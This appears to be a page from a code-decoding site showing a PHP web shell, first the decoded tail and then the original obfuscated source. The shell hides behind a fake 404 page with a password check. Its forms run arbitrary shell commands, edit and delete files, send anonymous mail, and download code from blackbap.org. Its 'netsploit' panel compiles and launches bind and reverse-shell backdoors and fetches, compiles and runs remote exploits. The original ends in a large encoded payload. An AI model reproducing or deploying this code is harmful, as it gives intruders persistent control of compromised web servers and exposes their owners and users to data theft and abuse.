$pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to MySQL</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">FBI!</textarea> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="Hello~" name="mail_subject" />&nbsp; subject</td></tr> <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","
"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2"></th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2"></th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://blackbap.org/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th></th><th></th><th>Load & Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="blackbap.org/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> </

Did this file decode correctly?

Original Code

<?php
@session_start();
@set_time_limit(0); 
@error_reporting(0);
$salt = "silic1234";
$psw = trim($_POST['pass']);
$pass = $salt.$psw;
$pass = md5(md5(md5($pass)));
$chk_login = 1;
$password = "8f841a9b44b0167db6056389e0106af4";
if($pass == $password)
{
$_SESSION['ses'] = "$pass";
}
if($chk_login)
{
if(!isset($_SESSION['ses']) or $_SESSION['ses'] != $password)
{
die("
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache Server at ".$_SERVER["HTTP_HOST"]." Port 80 </address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
");
}
}
$code = "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